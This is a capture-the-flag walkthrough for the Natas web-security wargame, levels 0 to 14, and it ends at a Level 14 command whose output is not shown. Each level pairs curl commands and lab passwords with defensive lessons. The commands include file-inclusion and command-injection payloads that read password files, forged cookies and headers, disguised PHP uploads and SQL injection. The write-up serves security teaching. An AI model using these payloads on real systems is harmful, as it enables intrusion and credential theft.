Natas

The Natas wargame covers basic concepts in server-side web security.

code

The code snippets provided here are not copy/pastable into a terminal, but instead prioritize readability. $PW is a placeholder for the password for the current level.

Runnable code for this walkthrough is available at haggqvist/otw.

Level 0

The 0th level includes the password for natas1 in the HTML document body:

$ curl -s http://natas0.natas.labs.overthewire.org \
> -u natas0:natas0 | grep natas1
<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

Level 1

This level has blocked right-clicking by using the oncontextmenu attribute, but this is easily bypassed by using a command line tool:

$ curl -s http://natas1.natas.labs.overthewire.org \
> -u natas1:$PW | grep natas2
<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Conclusion

Memes and easter eggs are encouraged in the source. Secrets? Not so much.

Level 2

For this level, the password is not readily available in the source:

$ curl -s http://natas2.natas.labs.overthewire.org \
> -u natas2:$PW | sed -n "/<body/,/body>/p"

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

sed pattern

The sed command used here extracts everything between the opening and closing HTML body tags, using an address range made up of two search patterns.

The files/pixel.png file is a 1x1 pixel image. It might contain some other data:

$ curl -s http://natas2.natas.labs.overthewire.org/files/pixel.png \
> -u natas2:$PW | strings
IHDR
gAMA
sRGB
 cHRM
PLTE
tRNS
bKGD
        pHYs
IDAT
%tEXtdate:create
2012-09-17T15:24:23+02:00
%tEXtdate:modify
2008-01-02T23:13:08+01:00
IEND

Nope, it doesn't look like it. Perhaps the /files directory is accessible? lynx is your friend if you like the idea of browsing the web from the terminal:

$ lynx -auth natas2:$PW http://natas2.natas.labs.overthewire.org/files/

A directory listing is returned, including a users.txt file:

                                 Index of /files

   [ICO] Name Last modified Size Description
     ___________________________________________________________________

   [PARENTDIR] Parent Directory   -
   [TXT] users.txt 2016-12-20 05:15 145
   [IMG] pixel.png 2016-12-15 16:07 303
     ___________________________________________________________________


    Apache/2.4.10 (Debian) Server at natas2.natas.labs.overthewire.org
    Port 80

... and the users.txt file contains the password for natas3:

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

Conclusion

The lesson here is to ensure that directory listings are disabled and that permissions are configured correctly for the web server. The user running the web server process must only be able to access files that are meant to be served as part of the site.

Level 3

Level 3 presents the following body:

<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>

This time around the only information shared is a comment that gives away an obvious hint. Search engines use web crawlers to index websites. It is common to use a robots.txt file to provide instructions to such programs (and occasionally easter eggs) about which pages are allowed to be accessed.

A quick check confirms the file exists, with a Disallow rule configured for the /s3cr3t/ path:

$ curl -s http://natas3.natas.labs.overthewire.org/robots.txt \
> -u natas3:$PW
User-agent: *
Disallow: /s3cr3t/

... and a users.txt file containing the natas4 credentials is available in this location:

$ curl -s http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt \
> -u natas3:$PW
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Conclusion

The correct way to prevent web crawlers from accessing pages is to require some form of authentication. Asking crawlers not to access a page does nothing to protect it. Since this level requires authentication, the appropriate mechanism to avoid crawling and indexing is actually already in place.

A robots.txt file does not prevent a webpage from being indexed and included in search engine results. To prevent a website from being indexed, there are other mechanisms such as the noindex meta tag.
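
To illustrate that robots.txt is purely advisory, the rules returned by this level can be fed to Python's standard urllib.robotparser module. This is only a sketch: a well-behaved crawler would consult can_fetch and stay away, but nothing stops any other client from requesting the path anyway.

```python
from urllib.robotparser import RobotFileParser

# The robots.txt contents returned by this level
ROBOTS_TXT = """\
User-agent: *
Disallow: /s3cr3t/
"""

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())

# A polite crawler asks before fetching; the answer is a request, not a barrier
secret_allowed = parser.can_fetch("*", "/s3cr3t/users.txt")
index_allowed = parser.can_fetch("*", "/index.html")
print(secret_allowed, index_allowed)
```

The disallowed path is exactly the one curl fetched above without any resistance from the server.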

Level 4

Let's check what Level 4 has in store:

<body>
<h1>natas4</h1>
<div id="content">

Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>

The hint given indicates that requests are expected to originate from another location. When following a link, browsers will typically automatically set the Referer HTTP header, including information about the site the request is coming from. This has valid uses but can be very problematic for privacy. Based on the message presented it looks like the site is using the Referer header value for access decisions.

This theory can be confirmed by setting a sample header in a request:

$ curl -s http://natas4.natas.labs.overthewire.org \
> -u natas4:$PW -H "Referer: camp7.colony.mars" | grep visiting
Access disallowed. You are visiting from "camp7.colony.mars" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"

The theory appears to be correct - the input value is reflected in the response. Updating the Referer header with the expected value grants access:

$ curl -s http://natas4.natas.labs.overthewire.org \
> -u natas4:$PW -H "Referer: http://natas5.natas.labs.overthewire.org/" |
> grep natas5
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Conclusion

The Referer HTTP header must never be used for access control or security. It can be set to any value by the agent making the request. Valid use cases for this header are ones related to analytics.
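
The point that the client chooses the header value can be shown without sending anything. The sketch below uses Python's standard urllib.request; the target URL is a placeholder chosen for illustration, and the request is only constructed, never sent.

```python
import urllib.request

# Placeholder target URL and an arbitrary Referer value, for illustration only
request = urllib.request.Request(
    "http://example.com/",
    headers={"Referer": "http://camp7.colony.mars/"},
)

# The request now carries whatever origin the client decided to claim
claimed_origin = request.get_header("Referer")
print(claimed_origin)
```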

Level 5

Time for the fifth level of Natas. The following site contents are presented:

<body>
<h1>natas5</h1>
<div id="content">
Access disallowed. You are not logged in</div>
</body>

The only detail shared is that we are currently not logged in. Using cookies is probably the most ubiquitous way of managing sessions with websites. We can use curl's -c flag with the - argument to print cookies to stdout:

$ curl -s -c - http://natas5.natas.labs.overthewire.org \
> -u natas5:$PW | tail -n 3
# This file was generated by libcurl! Edit at your own risk.

natas5.natas.labs.overthewire.org       FALSE   /       FALSE   0       loggedin        0

Right, so the site writes a cookie loggedin and sets the value to 0. It doesn't take too much cognitive effort to deduce that toggling this to 1 (or likely any other positive value) may be a good next step. The -b flag can be used to set cookies using curl:

$ curl -s -b "loggedin=1" http://natas5.natas.labs.overthewire.org \
> -u natas5:$PW | grep natas6
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>

Conclusion

The lesson is that cookies are controlled by the client. While the server can provide cookie values through the Set-Cookie HTTP header, clients can manipulate their values (or delete them) at any time. Using cookies to manage sessions and states is not bad per se, but values need to be randomly generated using a sufficient amount of entropy and tied to a specific user and session. They should also expire within a reasonable time frame.
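
A minimal sketch of the alternative, assuming a server-side store keyed by an opaque random token. The sessions dictionary and both helper functions are hypothetical stand-ins, and expiry is left out for brevity.

```python
import secrets

# In-memory stand-in for a server-side session store (hypothetical)
sessions: dict[str, dict] = {}


def create_session(username: str) -> str:
    """Create a session and return the opaque token to place in the cookie."""
    token = secrets.token_urlsafe(32)  # 32 random bytes from the OS CSPRNG
    sessions[token] = {"user": username, "logged_in": True}
    return token


def is_logged_in(token: str) -> bool:
    """Look the token up server side; unknown or forged values are rejected."""
    return sessions.get(token, {}).get("logged_in", False)


token = create_session("natas5")
print(is_logged_in(token), is_logged_in("1"))
```

With this design the cookie carries no meaning of its own, so changing it to 1 (or anything else) simply fails the lookup.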

Level 6

Level 6 presents a form into which the user is asked to submit a secret:

<body>
<h1>natas6</h1>
<div id="content">


<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

Rather helpfully, there's a link to the source of this implementation which presents additional detail. A short php script handles the form:

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
            print "Access granted. The password for natas7 is <censored>";
        } else {
            print "Wrong secret";
        }
    }
?>

This is just as basic as it looks. Submitting the form on the page makes a POST request to this script, which compares the value provided with a variable $secret defined in the secret.inc file. It turns out this file is accessible:

$ curl -s http://natas6.natas.labs.overthewire.org/includes/secret.inc \
> -u natas6:$PW
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Making a POST request to submit the form returns the password:

$ curl -s -X POST http://natas6.natas.labs.overthewire.org \
> -u natas6:$PW -F "secret=FOEIUWGHFEEUHOFUOIU" -F "submit=submit" |
> grep natas7
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Conclusion

There's really not much new to mention on this level: directory permissions are still the main problem. Not having access to the source code used by the form would've also made this more difficult.

Level 7

Level 7 presents a simple page with two links:

<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
</body>

As highlighted in the hint and mentioned in the introduction, the password for the next level is available in /etc/natas_webpass/natas8. Following either link simply renders the contents of the target file on the main site:

$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=home \
> -u natas7:$PW
this is the front page
$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=about \
> -u natas7:$PW
this is the about page

In summary, the page reads contents of files on the server's file system and displays this information when the links are followed. This can present a File Inclusion vulnerability, where the server can be requested to serve up the contents of arbitrary files, either remotely or locally. In this case, a Local File Inclusion attack is possible:

$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=/proc/version \
> -u natas7:$PW | grep Linux
Linux version 4.7.9-grsec (root@template) (gcc version 4.9.2 (Debian 4.9.2-10) ) #4 SMP Wed Nov 30 15:55:44 EST 2016
$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8 \
> -u natas7:$PW | grep -v "<"

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Conclusion

This vulnerability is a result of passing unvalidated user input to the PHP include expression. Similar issues exist for require. Use of include can be confirmed by passing in a file path that doesn't exist or that the application can't access:

$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=/such/gone/much/missing \
> -u natas7:$PW | grep "Warning"
<b>Warning</b>:  include(/such/gone/much/missing): failed to open stream: No such file or directory in <b>/var/www/natas/natas7/index.php</b> on line <b>21</b><br />
<b>Warning</b>:  include(): Failed opening '/such/gone/much/missing' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/natas/natas7/index.php</b> on line <b>21</b><br />

An E_WARNING generated from not being able to access the file is returned, exposing the include_path used which may help an attacker identify where other source files may be located.

This type of attack can be prevented in a number of ways, for example by maintaining a list of accepted input files, or by only searching for files within a given folder structure or of a particular type before handing over to include. In the latter cases, filtering would have to be used to remove escape patterns such as ../../ which could be used for directory traversal.
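
The list-of-accepted-files idea can be sketched as a lookup table. The page names come from the links on this level, while the file paths and the resolve_page helper are hypothetical.

```python
from typing import Optional

# Hypothetical mapping from the public "page" parameter to files on disk
ALLOWED_PAGES = {
    "home": "pages/home.html",
    "about": "pages/about.html",
}


def resolve_page(page: str) -> Optional[str]:
    """Return the file for a known page name, or None for anything else."""
    return ALLOWED_PAGES.get(page)


print(resolve_page("home"))
print(resolve_page("/etc/natas_webpass/natas8"))
print(resolve_page("../../etc/passwd"))
```

Because user input only ever selects a key, it never becomes part of a file path, and traversal patterns have nothing to act on.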

A basic way to restrict access to specific filenames may look like this:

<?php
include($_GET['page'] . '.php');
?>

In versions of PHP prior to 5.3.4, a NULL byte attack could be used to bypass this like so:

/index.php?page=/home/noob/.ssh/id_ed25519%00 # yoink!

Of course, restricting the permissions of the web server process so that it can only read the files it actually needs is also a good idea. Care must be taken not to expose internal error messages to the user, since these will almost certainly lead to unwanted data leakage.

Finally, it should be noted that this attack may also be used to load remote files using HTTP. In this case however, this functionality has been disabled by configuring allow_url_include:

$ curl -s http://natas7.natas.labs.overthewire.org/index.php?page=http://ifconfig.me \
> -u natas7:$PW | grep allow_url_include
<b>Warning</b>:  include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in <b>/var/www/natas/natas7/index.php</b> on line <b>21</b><br />

Level 8

This level presents another submit form which accepts some secret value:

<body>
<h1>natas8</h1>
<div id="content">


<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

Like a previous level, a link to the source code is included, which presents the following implementation:

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Everything needed is presented. The encodeSecret function just needs to be reversed using the $encodedSecret value as input. Reversing the function involves:

Convert hex string to bytes
Reverse the output
Base64 decode

Here's one way of doing this using python:

>>> import base64
>>> secret = bytes.fromhex("3d3d516343746d4d6d6c315669563362")
>>> secret = secret[::-1] # reverse
>>> base64.b64decode(secret).decode()
'oubWYf2kBq'

The resulting secret can be submitted into the form:

$ curl -s -X POST http://natas8.natas.labs.overthewire.org \
> -u natas8:$PW -F "secret=oubWYf2kBq" -F "submit=submit" |
> grep natas9
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Conclusion

The lesson to take away here is that data encoding != encryption. Schemes that rely on reversible encoding alone, such as HTTP Basic authentication without TLS, are not secure.
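
The Basic authentication example can be made concrete. The two helpers below are hypothetical and only mirror the well-known "username:password" Base64 scheme; the credentials are the public ones from Level 0.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization header value the way HTTP Basic auth does."""
    credentials = f"{username}:{password}".encode()
    return "Basic " + base64.b64encode(credentials).decode()


def recover_credentials(header_value: str) -> tuple[str, str]:
    """Reverse the encoding; no key or secret is required."""
    encoded = header_value.removeprefix("Basic ")
    username, _, password = base64.b64decode(encoded).decode().partition(":")
    return username, password


header = basic_auth_header("natas0", "natas0")
print(header)
print(recover_credentials(header))
```

Anyone who can observe the header can recover the credentials, which is why the scheme depends entirely on the transport being encrypted.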

Of course, without access to the source code it will not be as straightforward to reverse engineer the implementation. Basing the security of a system on the source code not being accessible is a bad idea.

Level 9

Another level, another submit form:

<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

In line with previous levels a link to the source code is included:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

User input passed in the needle parameter is used to grep contents from a dictionary.txt file, for example:

$ curl -s -X POST http://natas9.natas.labs.overthewire.org \
> -u natas9:$PW -F "needle=derp" -F "submit=submit" |
> sed -n "/<pre>/,/<\/pre>/p"

<pre>
underpants
underpass
underpass's
underpasses
underprivileged
</pre>

The issue here is that $key is passed directly to grep without filtering. As a quick reminder, the syntax for grep is as follows:

$ grep --help| head -3
Usage: grep [OPTION]... PATTERNS [FILE]...
Search for PATTERNS in each FILE.
Example: grep -i 'hello world' menu.h main.c

Because grep allows searching in one or more files the input can be modified to search an arbitrary file. So one way of solving this challenge would be to make the program search multiple files, for example resulting in the following command:

grep -i . /etc/natas_webpass/natas10 dictionary.txt

By adding a #, it is even possible to exclude the dictionary.txt file:

$ curl -s -X POST http://natas9.natas.labs.overthewire.org \
> -u natas9:$PW -F "needle=. /etc/natas_webpass/natas10 #" -F "submit=submit" |
> sed -n "/<pre>/,/<\/pre>/p"

<pre>
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
</pre>

Conclusion

for i in {1..100}; do echo "Never trust user input!"; done

Simple ways of addressing this include:

Wrapping the input string in quotes and escaping any quotes it contains (for example with escapeshellarg)
Splitting the input string on spaces and only passing the first value

In both cases, a single value would be used for the pattern and additional files would not be searched.
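
A Python sketch of the same idea, since the walkthrough already uses python for tooling. The two builder functions are hypothetical: the first avoids the shell entirely by producing an argument list, the second quotes the untrusted value with shlex.quote when a shell string cannot be avoided.

```python
import shlex


def build_grep_command(needle: str) -> list[str]:
    """Return an argument vector; no shell is involved, so nothing is re-parsed."""
    # "--" marks the end of options so a needle starting with "-" is not a flag
    return ["grep", "-i", "--", needle, "dictionary.txt"]


def build_shell_string(needle: str) -> str:
    """If a shell string is unavoidable, quote the untrusted value."""
    return f"grep -i -- {shlex.quote(needle)} dictionary.txt"


payload = ". /etc/natas_webpass/natas10 #"
print(build_grep_command(payload))
print(shlex.split(build_shell_string(payload)))
```

In both variants the whole payload ends up as a single pattern argument, so the extra file name and the trailing # lose their effect. The argument list form would be handed to something like subprocess.run without shell=True.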

Level 10

Level 10 is basically a repeat of Level 9, except some filtering is now applied:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

This highlights the fact that Level 9 could have been solved in a different way, by using command injection:

$ curl http://natas9.natas.labs.overthewire.org \
> -u natas9:$PW \
> -G --data-urlencode "needle=; cat /etc/natas_webpass/natas10 #" \
> -d "submit=search" | sed -n "/<pre>/,/<\/pre>/p"
<pre>
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
</pre>

... but the approach demonstrated for Level 9 still works:

$ curl -s -X POST http://natas10.natas.labs.overthewire.org \
> -u natas10:$PW \
> -F "needle=-H . /etc/natas_webpass/natas11 #" -F "submit=submit" |
> grep natas11:
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Conclusion

While this may be a step in the right direction of validating user input, it is simply not enough.
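
The gap in the filter can be checked offline. The sketch below reuses the character class from the preg_match call in the source; the is_rejected helper is hypothetical.

```python
import re

# Same character class as the preg_match call in the Level 10 source
BLOCKLIST = re.compile(r"[;|&]")


def is_rejected(needle: str) -> bool:
    """Mimic the level's check: reject input containing ;, | or &."""
    return BLOCKLIST.search(needle) is not None


injection = "; cat /etc/natas_webpass/natas11 #"   # command injection attempt
extra_file = "-H . /etc/natas_webpass/natas11 #"   # extra file argument
print(is_rejected(injection), is_rejected(extra_file))
```

The command injection payload is caught, but the payload that merely adds an option and a file name passes, because none of its characters are on the blocklist.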

Level 11

Level 11 introduces some new concepts:

<body style="background: #ffffff;">
Cookies are protected with XOR encryption<br/><br/>


<form>
Background color: <input name=bgcolor value="#ffffff">
<input type=submit value="Set color">
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The website states that cookies are protected by XOR "encryption" and there's a form to set the background color. Presumably cookies in the response are used to store session data, including the color.

The following source code is provided (edited slightly for readability):

<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata)
        && array_key_exists("showpassword", $tempdata)
        && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);

if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>

Here's a breakdown:

An array is declared with default values for showpassword and bgcolor
An encryption function that accepts text input and XORs each character against a key is defined
Functions to load and save data are defined. The data is JSON-encoded, XOR-encrypted and Base64-encoded before being saved, and the reverse is applied when it is loaded. The data is stored in a data cookie
The user can modify bgcolor through the submit form. Regex is used to ensure a valid RGB hex pattern
If $data['showpassword'] is set to "yes", the password for natas12 is displayed

A reasonable way to attack this level may be to manually create a cookie with a value, such that when decoded and decrypted, showpassword is set to "yes". The encryption needs to be reversed to enable this.

The interesting thing about XOR encryption applied this way is that it is 100% reversible. Any given output will convert back to its input. This also means that keys can be leaked with a known plaintext attack. For example:

>>> from itertools import cycle
>>> def xor(text: str, key: str="secret") -> str:
...     xor_list = zip(text, cycle(key)) if len(text) > len(key) else zip(cycle(text), key)
...     return "".join(chr(ord(a) ^ ord(b)) for a, b in xor_list)
...
>>> xor("hello")
'\x1b\x00\x0f\x1e\n\x1c'
>>> xor(xor("123456"), key="123456")
'secret'
>>> xor(xor("fish go moo!"), key="fish go moo!")
'secretsecret'

This approach can be used to compute the key using the default JSON-encoded $data array and the default cookie value. The default cookie, which reflects showpassword: no and bgcolor: #ffffff can be obtained as follows:

$ curl -s -c - http://natas11.natas.labs.overthewire.org \
> -u natas11:$PW | tail -n1 | cut -f7
ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D

It should be noted that the cookie is URL encoded. Continuing from the python REPL above, the key can be computed:

>>> import json, base64
>>> cookie = base64.b64decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=").decode()
>>> key = { "showpassword": "no", "bgcolor": "#ffffff" }
>>> key = json.dumps(key, separators=(",", ":")) # compact JSON
>>> xor(cookie, key=key)
'qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq'
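
The repeating pattern in this output can also be reduced programmatically instead of by eye. The shortest_period helper below is hypothetical and not part of the original solution; it simply looks for the shortest prefix that regenerates the whole string.

```python
def shortest_period(stream: str) -> str:
    """Return the shortest prefix that, repeated, reproduces the whole stream."""
    for size in range(1, len(stream) + 1):
        candidate = stream[:size]
        repeated = candidate * (len(stream) // size + 1)
        if repeated[: len(stream)] == stream:
            return candidate
    return stream


keystream = "qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq"
print(shortest_period(keystream))
```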

The key appears to be "qw8J". This can be used to compute a new cookie:

>>> key = "qw8J"
>>> data = { "showpassword": "yes", "bgcolor": "#ffffff" }
>>> data = json.dumps(data, separators=(",", ":"))
>>> cookie = xor(data, key=key)
>>> base64.b64encode(cookie.encode()).decode()
'ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK'

... which can be used to get the password for natas12:

$ curl -s http://natas11.natas.labs.overthewire.org \
> -u natas11:$PW \
> -b "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" |
> grep natas12
The password for natas12 is EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3<br>

Conclusion

There are two main lessons to take away from this level. The first is that this XOR implementation is completely insecure and leaks the key used. The second lesson is that it is not a good idea to mix user settings with sensitive data. There's no reason why the user preferences that do not contain any sensitive data could not be stored in separate cookies, removing the need for encryption.

Cookies used for authentication should, where possible, be entirely random values. The random value can be mapped to some state in the backend.

Level 12

Level 12 includes a multipart form to upload files:

<body>
<h1>natas12</h1>
<div id="content">

<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="rp02dxd4ko.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The source code is provided, but is not necessarily needed to beat this level. The file name is set in the hidden filename field, which means its extension can be manipulated by the client. It should be possible to override this and upload a php file that reads out the password for natas13:

natas12.php

<?
include('/etc/natas_webpass/natas13');
?>

Upload the file:

$ curl -s http://natas12.natas.labs.overthewire.org \
> -u natas12:$PW \
> -F "uploadedfile=@natas12.php" -F "filename=natas12.php" | grep upload
The file <a href="upload/84deai98yl.php">upload/84deai98yl.php</a> has been uploaded<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

... and visit the site:

$ curl -s http://natas12.natas.labs.overthewire.org/upload/84deai98yl.php \
> -u natas12:$PW 
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Conclusion

Yet another case of not sanitizing user input. In addition to enforcing the file extension server side, it would also be appropriate to inspect the file's contents (e.g. header) to determine its actual MIME type.
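
Enforcing the extension server side can be as simple as never using the client's file name at all. The sketch below is a hypothetical helper; the fixed .jpg extension is an assumption based on the form asking for a JPEG.

```python
import secrets

# Assumed policy: the only extension this upload endpoint should ever produce
ALLOWED_EXTENSION = ".jpg"


def make_target_name(client_filename: str) -> str:
    """Ignore the client-supplied name entirely and generate one server side."""
    # client_filename is accepted only to show that it is deliberately unused
    return secrets.token_hex(8) + ALLOWED_EXTENSION


target = make_target_name("natas12.php")
print(target)
```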

Level 13

Continuation from Level 12, but this time around additional restrictions are applied to the files uploaded:

<?
/* snip */
if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path))
/* snip */
?>

The exif_imagetype function reads the first few bytes of an image to check its signature. It might be possible to get around this by creating a file that starts with a valid jpeg header, followed by php code to read a file as used in Level 12.

First, the php file is prepared:

natas13.php

<?
include('/etc/natas_webpass/natas14');
?>

Next, a JPEG header is written to a file, followed by the contents above:

$ echo -n -e '\xFF\xD8\xFF' > natas13.pwn
$ cat natas13.php >> natas13.pwn
$ stat -c %s natas13.pwn
47

Repeat the approach used in Level 12:

$ curl -s http://natas13.natas.labs.overthewire.org \
> -u natas13:$PW \
> -F "uploadedfile=@natas13.pwn" -F "filename=natas13.php" | grep upload
The file <a href="upload/8l8zc047qi.php">upload/8l8zc047qi.php</a> has been uploaded<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
$ curl -s http://natas13.natas.labs.overthewire.org/upload/8l8zc047qi.php \
> -u natas13:$PW
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Conclusion

This is a slight improvement over the previous Level, in the sense that some validation is now happening. It is however insufficient to rely on hints from file headers to determine all the contents of a file. While more thorough parsing of files to determine their type could be useful, the right way to prevent this sort of attack is to ensure the files uploaded are never interpreted as executable code.
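
Why a signature check alone falls short can be shown with a simplified stand-in. The looks_like_jpeg function below is hypothetical and only compares leading bytes; it is not how exif_imagetype is actually implemented.

```python
JPEG_MAGIC = b"\xff\xd8\xff"


def looks_like_jpeg(data: bytes) -> bool:
    """Naive signature check: inspect only the leading bytes."""
    return data.startswith(JPEG_MAGIC)


php_payload = b"<?\ninclude('/etc/natas_webpass/natas14');\n?>\n"
disguised = JPEG_MAGIC + php_payload

print(looks_like_jpeg(php_payload), looks_like_jpeg(disguised))
print(b"<?" in disguised)
```

The disguised file passes the check while still containing the php opening tag, which is all the interpreter needs if the file is later served with a .php extension.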

Level 14

Level 14 presents a login form:

<body>
<h1>natas14</h1>
<div id="content">

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>

The following source code is provided:

<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

Aside from storing passwords in plaintext, there are two main problems here:

Input for the SQL query is not properly sanitized
Access logic is limited to checking that more than 0 rows are returned

The debug flag is also interesting, as it enables printing the resulting SQL query. In php, the $_GET variable is populated not only by HTTP GET requests but by any request with a query string. For example:

$ curl -s -X POST http://natas14.natas.labs.overthewire.org?debug=yes \
> -u natas14:$PW \
> -F "submit=Login" -F "username=natas15" -F "password=???" | grep Executing
Executing query: SELECT * from users where username="natas15" and password="???"<br>Access denied!<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>

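It should be sufficient to make this query return at least one row. This can be achieved using a query as follows. Because AND binds more tightly than OR, the trailing or "42" makes the condition true for every row, regardless of the username and password supplied: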

SELECT * from users where username="natas15" and password="secret" or "42"

This can be achieved by setting the password parameter to secret" or "42, escaping the quotes as necessary:

$ curl -s -X POST http://natas14.natas.labs.overthewire.org?debug \
> -u natas14:$PW \
> -F "submit=Login" -F "username=natas15" -F "password=secret\" or \"42" |
> grep natas15
